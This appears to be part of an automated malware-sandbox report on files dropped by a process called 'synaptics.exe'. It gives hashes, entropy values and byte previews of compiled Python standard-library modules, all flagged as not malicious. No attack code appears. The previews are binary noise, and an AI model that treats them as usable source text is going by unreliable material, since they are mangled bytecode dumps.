                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z e.e!e.f...Z"e.e!e.j#f...Z$d.e"d.e$d.e.f.d.d...Z%....d3d.e"d.e$d.e!d.e!d.e.f.d.d...Z&d.e"d.e$d.e'f.d.d...Z(....d3d.e"d.e$d.e!d.e!d.e!f.d.d ..Z)d.e"d.e$d.d!f.d"d#..Z*d$d%..Z+d&d'..Z,d(d)..Z-d.e"d*e!d.e.f.d+d,..Z/d.e"d.e.e!..f.d-d...Z0e.d/d0....Z1e1.2e...d1d2....Z3d.S.)4.....N.....)..._common)...as_file..files)...ResourceReader)...suppress)...ResourceLoader)...ModuleSpec)...BytesIO..TextIOWrapper)...Path)...ModuleType)...ContextManager..Iterable..Union)...cast)...BinaryIO..TextIO)...Sequence)...singledispatch)...Package..Resourcer....r......contentsr......is_resource..open_binary..open_text..path..read_binary..read_text..package..resource..returnc....................C...s&...t...|...}.t...|...}.t...|...}.|.d.u.r.|...|...S.t.t.|.j...}.|
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9339
                                                                                                                                                                                                                Entropy (8bit):5.315858225816917
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:/pt4ll1YVqQzvbab+Q3+LbcwE5lFz0w7/RhZT:Ril1YVqoeb+QuLbpmFz06RhZT
                                                                                                                                                                                                                MD5:302A96CC0F039B2B8FB2F62C95D5B163
                                                                                                                                                                                                                SHA1:FA6F3F1DB80FEA57E0A564DBD104B839B7B49E38
                                                                                                                                                                                                                SHA-256:BB884405644F2C0A1192F5505545177B6DAE306E9985BC231D87BBE1DA4D9697
                                                                                                                                                                                                                SHA-512:93AE92C835E7B036BDC5B98E6455AFC5A0EA03586E8EA5102E47120F901B0238CFF18C5B80BFC846906E358DF6122CF5778E24706A269208640829682AC970C6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s*...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d$d.d...Z.d$d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z d.S.)%z-Utility code for constructing importers, etc......)...Loader)...module_from_spec)..._resolve_name)...spec_from_loader)..._find_spec)...MAGIC_NUMBER)..._RAW_MAGIC_NUMBER)...cache_from_source)...decode_source)...source_from_cache)...spec_from_file_location.....)...contextmanagerNc....................C...s....t...t.|...S.).zBReturn the hash of *source_bytes* as used in hash-based pyc files.)..._imp..source_hashr....)...source_bytes..r...../C:\Users\user\Desktop\tmp\lib\importlib\util.pyr........s......r....c....................C...s\...|...d...s.|.S.|.s.t.d.t.|.....d.......d.}.|.D.].}.|.d.k.r...n.|.d.7.}.q.t.|.|.d.....|.|...S.).z2Resolve a relativ
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):37106
                                                                                                                                                                                                                Entropy (8bit):5.210745039658831
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:KuMjZ3JEQWRwd2Aj+j5HlBqOVKpmtI5FugF0Mj:KucAL9BANHcgFRj
                                                                                                                                                                                                                MD5:0D019B8B6FC90267890C1DB17129A43D
                                                                                                                                                                                                                SHA1:EBBD6687FB52FD317D2F82789FF402ABA32D21C3
                                                                                                                                                                                                                SHA-256:F2F667F7C3B61A0419D6305D312E99848164F643314085E4804E942A9777072F
                                                                                                                                                                                                                SHA-512:74F8F460719A6ADF75AE7BB80AC13A8C52DFB2AB7A9E954440236393AA58F359200DCFFDAD552772AF36960583BF9EB970F572EA2362548608C2B8AD0EBBEB13
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.{.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l.m"Z"..d.d.l#m$Z$m%Z%m&Z&m'Z'..g.d...Z(G.d.d...d.e)..Z*G.d.d...d...Z+G.d.d...d.e..,d.d.....Z-G.d.d...d.e...Z/G.d.d...d.e/..Z0G.d.d...d...Z1G.d.d...d.e1e2..Z3G.d.d ..d e.j4..Z5G.d!d"..d"..Z6G.d#d$..d$..Z7G.d%d&..d&e!..Z8G.d'd(..d(..Z9G.d)d*..d*..Z:G.d+d,..d,..Z;G.d-d...d.e8..Z<G.d/d0..d0e7..Z=d1d2..Z>d3d4..Z?d5e.j.f.d6d7..Z@d8d9..ZAd5e'e0e3f...f.d:d;..ZBd<d=..ZCd>d?..ZDd5e%eEe$eE..f...f.d@dA..ZFd.S.)B.....N.....)..._adapters.._meta)...PackageMetadata)...FreezableDefaultDict..Pair)...method_cache..pass_none)...unique_everseen).r......SimplePath)...suppress)...import_module)...MetaPathFinder)...starmap)...List..Mapping..Optional..Union)...Distribution..DistributionFinderr......PackageNotFoundError..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2354
                                                                                                                                                                                                                Entropy (8bit):5.145329664194524
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:8uvHOKj0XocKHdq5UHdUktPdSNwplt9SDYvloUTG:zHOKiocKHdqUdUWlSWplZ9oEG
                                                                                                                                                                                                                MD5:56726666BC1A091F87F1E812027ADFD6
                                                                                                                                                                                                                SHA1:53284AE9AA1621CC5973407D786631471464099F
                                                                                                                                                                                                                SHA-256:256106BF113F417E80C3B823C2902A6EE6888908CEA3E3A959F0BDF45888BCF1
                                                                                                                                                                                                                SHA-512:BD777F63D812F5A734DD94EDEF326B7618FF0B46819A7D17690148AC29E5758AC9BD56180C9E894316EE4903C74D48B6BCA419104892694CA360D8FB93527759
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s<...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j.j...Z.d.S.)......N.....)...FoldedCasec........................sb...e.Z.d.Z.e.e.e.g.d.......Z...d.e.j.j.f...f.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e.d.d.....Z.....Z.S.)...Message).Z.Classifierz.Obsoletes-DistZ.Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-PlatformZ.Dynamic..origc........................s"...t.....|...}.t.|.....t.|.......|.S...N)...super..__new__..vars..update)...clsr......res....__class__...=C:\Users\user\Desktop\tmp\lib\importlib\metadata\_adapters.pyr........s..........z.Message.__new__c....................O...s....|.....|._.d.S.r....)..._repair_headers.._headers)...self..args..kwargsr....r....r......__init__#...s......z.Message.__init__c........................s....t.......S.r....).r......__iter__..r....r....r....r....r....'...s......z.Message.__iter__c........................s>...d.d.......f.d.d...t.|...d...D...}.|.j.r.|.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1529
                                                                                                                                                                                                                Entropy (8bit):4.998146887035629
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:nBf0kCRklLM8ZOSIJOmhgP3uSb7TVMPt/fkWB16RB6lghkChedco/qq6Ddqrqqp:nBf0Xkl4KOSI4mh6pTqdcWB1cegfhe+y
                                                                                                                                                                                                                MD5:5C9347B5006304ABDBAF8EB3E4084C02
                                                                                                                                                                                                                SHA1:1990E95CCFE324C5FBE6D9287A48A7911018D565
                                                                                                                                                                                                                SHA-256:402D54065E36FB5BBBA87543EB059AD5C1D1E385E4DB95759777530796F7C779
                                                                                                                                                                                                                SHA-512:390A7498E629C9B12FD946AA06307999A58FD43A150BB539846317D2145F27F1D6EBFC9D97169C2488B7E4E37B21C2F0D53AB349850954DAEA6E094F3DF3DC41
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s6...d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e...d.d.....Z.d.S.)......Nc........................s(...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.....Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c........................s....t.|.d.t...j...|...S.).N.._frozen)...getattr..super..__missing__)...self..key....__class__...@C:\Users\user\Desktop\tmp\lib\importlib\metadata\_collections.pyr........s......z FreezableDefaultDict.__missing__c........................s......f.d.d....._.d.S.).Nc........................s..........S.).N)...default_factory).r......r....r....r......<lambda>....s......z-FreezableDefaultDict.freeze.<locals>.<lambda>).r....r....r....r....r......freeze....s......z.FreezableDefault
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3119
                                                                                                                                                                                                                Entropy (8bit):5.0848622480733585
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:nHbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/yC:+oOCDUX4sXwjvMXNpa5p1qoOIk
                                                                                                                                                                                                                MD5:DDD0BFD11C943FF71F34E206BDE3163D
                                                                                                                                                                                                                SHA1:E19780D26EC3DD0631113E7C424139C1D2277E5D
                                                                                                                                                                                                                SHA-256:213090FCD6A08CDE99677850D3AC49FFE624E451286BE26B9ECF11A04B56B03D
                                                                                                                                                                                                                SHA-512:C37F1B84AF66DC7B8564FEEC38FEE14828F9650194728F4D4146E3B89AC541E893FC1BE7E7D71792A363BE289429F51DCE129DF97B5F245A03E584AE8046E728
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s&...d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.S.)......Nc........................s(.....p.t...........f.d.d...}.d.d...|._.|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):581
                                                                                                                                                                                                                Entropy (8bit):5.105527166724522
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:C3l0//48ZPUbmR6OHRgD4gvwfJLV0jyr4euDsoVzoufN++k+Zqq18:0WDPUe6+k4fJgyE9gODlfnZqq18
                                                                                                                                                                                                                MD5:8F3AA89007D682EB8B5E51E70635976D
                                                                                                                                                                                                                SHA1:6BE5902CA164D3CC79E9E3CB31B3AE93825338BD
                                                                                                                                                                                                                SHA-256:6EF77F7CF13F6484B4F745003C61F7D81CABB3058C1C0388E17DB4E8EB965AD6
                                                                                                                                                                                                                SHA-512:C1360F5BD9D758C03D82587205B2909A7964D3A25EA737BD281D3E441945856932954B2F23B1490DF7B2D70FBFE5AA08E15D89CA9A180E76D543E3546D38FFA0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dr........................@...s....d.d.l.m.Z...d.d.d...Z.d.S.)......)...filterfalseNc....................c...sf.....t...}.|.j.}.|.d.u.r.t.|.j.|...D.].}.|.|.....|.V...q.d.S.|.D.].}.|.|...}.|.|.v.r0|.|.....|.V...q.d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seenZ.seen_add..element..k..r.....>C:\Users\user\Desktop\tmp\lib\importlib\metadata\_itertools.py..unique_everseen....s..................................r....).N)...itertoolsr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2274
                                                                                                                                                                                                                Entropy (8bit):4.708508640325835
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:6gnzBuSda0qUuJpYwj1JEZNmsZBCdHEjX9vlq:6gNuaa0qUAp/j1JErm8BCdHED90
                                                                                                                                                                                                                MD5:4FC6971B9F592B4A2AB729A1A835C81B
                                                                                                                                                                                                                SHA1:E0E0829676E1DC81B7640C1AA5FE8DCB716DBBEC
                                                                                                                                                                                                                SHA-256:50D630350EDD427D7436CD5CEA27A3F816F00AAD59DE1186565101006517E970
                                                                                                                                                                                                                SHA-512:F80791DAC0AB76097022BE274E5E964EF4B7CDA587F20D2E05ADB79E6BD52FEC90BDAEB36E2923651533D45BE606CF209503425A41377932204727DB4153DC88
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sP...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......)...Any..Dict..Iterator..List..Protocol..TypeVar..Union.._Tc....................@...s....e.Z.d.Z.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e...f.d.d...Z.d.d.e.d.e.d.e.e.e...e.f...f.d.d...Z.e.d.e.e.e.e.e.e...f...f...f.d.d.....Z.d.S.)...PackageMetadata..returnc....................C........d.S...N......selfr....r.....9C:\Users\user\Desktop\tmp\lib\importlib\metadata\_meta.py..__len__...........z.PackageMetadata.__len__..itemc....................C...r....r....r....).r....r....r....r....r......__contains__....r....z.PackageMetadata.__contains__..keyc....................C...r....r....r....).r....r....r....r....r......__getitem__....r....z.PackageMetadata.__getitem__c....................C...r....r....r....r....r....r....r......__iter__....r....z.PackageMetadata.__iter__...name..failobjc....................C........d.S.).zP. Return all values a
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3070
                                                                                                                                                                                                                Entropy (8bit):5.047429868056239
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:CRhiYmIWTDvbG12wYRzHiUyOrIuxeQc2zGV4Kr8iOqLigqyiFqYbvHqMHXNVwQqg:8hFXWTrbGowYRzHinOrIAeQc2u4KrvOD
                                                                                                                                                                                                                MD5:8B77C34330879D557C001FD1C4BBDEBF
                                                                                                                                                                                                                SHA1:592B4BAEEBDF3B78108B7059E86711591119473D
                                                                                                                                                                                                                SHA-256:E78AA05E9688D09707877F27B86336390750A6D892D2DDE32E452B669F2DDA40
                                                                                                                                                                                                                SHA-512:2FBBD6E9B2E6C5358C04F5C1B2D3BB38063288AC724C17DED759FD75A0DC6BD7401A9C63370A90890AC8AEE653F35A6DF221061D98D5C31B54B5B21E96470592
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s(...d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N.....)...method_cachec........................sr...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e...f.d.d.....Z.d.d...Z.d.d.d...Z.....Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCa
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):12274
                                                                                                                                                                                                                Entropy (8bit):5.3813126552682675
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:0M0k25NKigD6B7+vx1GkRGqb9j4ntKv72vx1GkRGqb4MmQTQOQkQsx1LtbQkQsxz:0M0TNKigBvx99j4t3vxx47OZrXZrb/
                                                                                                                                                                                                                MD5:7A55604BCD42ED8F9B2ACADBEED849F4
                                                                                                                                                                                                                SHA1:8A90B6011FFB6BE6C185394472011C0CC1AF739E
                                                                                                                                                                                                                SHA-256:38F763227D6550BF2790AE50B002376995C0145D91CB06F7E7CE00915101FE92
                                                                                                                                                                                                                SHA-512:9858200C9C6AF7563806C1FEE2167D752C4059CA9C71A5D6160EC3984799F678600B8F6964CA939A62B9C7803A10BADEBDCDBAFD4B8D2212E987EA1CD8AA9A5B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d+8.......................@...s....d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.e.d.d.d.d.d.d.d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d...Z.d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.S.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)). {"
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9776
                                                                                                                                                                                                                Entropy (8bit):5.561507041785419
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:OEe7HwdynOu7lf2/T40TuJLStugwlF8mbANHFThJt7AeI8I9iyrl:xsHwdyNV2/DTcOtw8muI9EyB
                                                                                                                                                                                                                MD5:BDC89D0BE31820EBC3BF88D97023D4D8
                                                                                                                                                                                                                SHA1:E4E026F341AB72E90490EB061F944977BB407453
                                                                                                                                                                                                                SHA-256:A72E91F1397535949D262EC9F0F4ABEF4AC4673484BFD52F2289DDDC130E5FEA
                                                                                                                                                                                                                SHA-512:9B7EDB17602FCE66F6300697C7519CC82254FA468228A1D3B8E58C5F1A9428DB77EFA768BB7FAAD57AA6129980F81664D908BBA2C514C539A1FE3F4B26F4C2FF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.2.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.d.g.Z.e.j.e.j.B.e.j.B.Z.e.d...Z.e.d...Z.e.d...Z.G.d.d...d.e...Z.e.e.e.d...Z.e...d.e...Z.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.e.e.j.f.d.d...Z.e.phe.Z.e...d.e...Z.d.Z.d.e.j.e.f.d.d...Z.e.j.e.f.d.d ..Z.G.d!d...d.e...Z.d.S.)"z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c....................C...sb...|...d.d.|...d...}.|.|...d.d.|.....}.d.|.|.|.|.f...}.t...|.|.....|.|._.|.|._.|.|._.|.|._.|.|._.d.S.).N...r.........z.%s: line %d column %d (char %d))...count..rfind..ValueE
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11127
                                                                                                                                                                                                                Entropy (8bit):5.493609123589281
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:0pqBSTkkgsft4MszI6lxnP14KAZX/WPxDvoLabuHyjnFibetRv4UO4FR0Q:pEDiMUnd4CPxDzbuS7FiTEd
                                                                                                                                                                                                                MD5:746C03A8BC2514C095FAC779E117C529
                                                                                                                                                                                                                SHA1:2BE280A22E97A06795DB2337DD059BF364D67C6F
                                                                                                                                                                                                                SHA-256:F37348D0CD0EFCB8146DDCEA1DF32FB25DA9224C6D9EE37FBE5B908EB78C6FF1
                                                                                                                                                                                                                SHA-512:9CFE720B05DE66F69479D234CE64A7E9F4F6A7BC0424BA64878F0F4382270C775458F88B640FFE4740C28EA468914D9D45F33F0B6E132A3C9999B4AA5A8BC157
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.@.......................@...s6...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.yA......d.Z.Y.n.w.e...d...Z.e...d...Z.e...d...Z.d.d.d.d.d.d.d.d...Z.e.d...D.].Z.e...e.e...d...e.......q_e.d...Z.d.d...Z.e.pxe.Z.d.d...Z.e.p.e.Z.G.d.d...d.e...Z.e.e.e.e.e.e.e.e e!e.j"f.d.d...Z#d.S.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc....................C........d.d...}.d.t...|.|.....d...S.).z5Return a JSON representation of a Python string.. c....................S...s....t.|...d.....S.).Nr....)...ESCAPE_DCT..group)...match..r.....-C:\Users\user\Desktop\tmp\lib\json\encoder.py..replace(...s......z%py_encode_basestring.<locals>.replacer....)...ESCAPE..sub....sr....r....r....r......py_encode_basestring$...s........r....c...................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1926
                                                                                                                                                                                                                Entropy (8bit):5.587151504714584
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:Awhn/cfelN3xf9oIIv3y1R0vSFk9dVTdOIC54vD:X0MFLIPwGXTd9CeD
                                                                                                                                                                                                                MD5:E12E6662D459374E9648A607F406B5BA
                                                                                                                                                                                                                SHA1:D1D643051C08A50A0708D504325487D3B7661062
                                                                                                                                                                                                                SHA-256:6278B45BFD86C7D10DA9EF20FDC557A7DB67643FEE81B1F21E035CE09DFCD5DF
                                                                                                                                                                                                                SHA-512:591A99A0ECBEEB1E834B4176F8115DC80F5864B578AE527D6F6DC780A9DCFD5FAECB394F45B5ADC8BA1B27FD41859BF89746A2A409E0AC0ED7C3A010425BBA3B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sh...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.g.Z.e...d.e.j.e.j.B.e.j.B...Z.d.d...Z.e.p1e.Z.d.S.).z.JSON token scanner......N)...make_scannerr....z)(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?c........................sv...|.j...|.j...|.j...t.j...|.j...|.j...|.j...|.j...|.j...|.j...|.j...........................f.d.d.........f.d.d...}.|.S.).Nc........................s....z.|.|...}.W.n...t.y.......t.|...d...w.|.d.k.r...|.|.d.......S.|.d.k.r0..|.|.d...f.............S.|.d.k.r=..|.|.d...f.....S.|.d.k.rQ|.|.|.d.......d.k.rQd.|.d...f.S.|.d.k.re|.|.|.d.......d.k.red.|.d...f.S.|.d.k.ry|.|.|.d.......d.k.ryd.|.d...f.S...|.|...}.|.d.u.r.|.....\.}.}.}.|.s.|.r...|.|.p.d...|.p.d.....}.n...|...}.|.|.....f.S.|.d.k.r.|.|.|.d.......d.k.r...d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.t.|.....).N..".......{..[..n.....Z.null..t..trueT..f.....Z.falseF....N.......NaN..I.......Infinity..-.....z.-Infinit
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):66901
                                                                                                                                                                                                                Entropy (8bit):5.22717122798343
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:NdNUR9zPwqY+L88QliC9Xxa2F3rnM4mpcQS1w+xtZUuJpw2bEOrQ0aWsV:NdyXme88Qli8X82JrMFcT/yN1V
                                                                                                                                                                                                                MD5:5EE336C512DD7EA610205F9D3B92F6FA
                                                                                                                                                                                                                SHA1:5F81FD798E4B6AB863E47B58BC7F63E7C1286BCC
                                                                                                                                                                                                                SHA-256:22653F9E8D991E773B17A4D2E190A122C7B5E30411DC275142ACC5EB4DBE1008
                                                                                                                                                                                                                SHA-512:0CFE238AA4438625CD3ACE8E50149FA9227BD57202DB59F0BCB4E9991DEBB01457F76BD3434E9D99854E198A94DDCBFDB46DAB3E88637F4F3B3561763A1810C0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d=B.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.e.....Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z.d.Z.d.Z d.Z!e.d.e.d.e.d.e.d.e d.e!d.i.Z"e.e.e.e.e.e.e e!d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e.j(.)e%j*j+..Z,d d!..Z-e.....Z/d"d#..Z0d$d%..Z1e&e.d&..s.d'd(..Z2n.e..3..Z4d)d(..Z2d*d+..Z5e.j6e0e5e1d,....G.d-d...d.e7..Z8e8a9d/d0..Z:d1d2..Z;d3d4..Z<e...Z=[.G.d5d6..d6e7..Z>G.d7d8..d8e>..Z?G.d9d:..d:e>..Z@d;ZAe>eAf.e?d<f.e@d=f.d>..ZBG.d?d@..d@e7..Z.e...ZCG.dAdB..dBe7..ZDG.dCdD..dDe7..ZEG.dEdF..dFe7..ZFe..G..ZHg.ZIdGdH..ZJdIdJ..ZKG.dKdL..dLeF..ZLG.dMdN..dNeL..ZMG.dOdP..dPeM..ZNG.dQdR..dReM..ZOeOe...ZPePZQG.dSdT..dTe7..ZRdUdV..ZSdWdX..ZTG.dYdZ..dZe7..ZUG.d[d\..d\eF..ZVG.d]d^..d^eV..ZWeVaXG.d_d`..d`e7..ZYeWe...ZZeZeV_ZeUeVjZ..eV_[dadb..Z\d.dcdd..Z]dedf..Z^dgdh..Z_didj..Z`d.dk..dldm..Zadndo..Zbdpdq..Zcdrds..Zddtdu..Zedvdw..Zfe.f.dxdy..ZgeIf.dzd{..Zhd.d.liZiei.jeh..
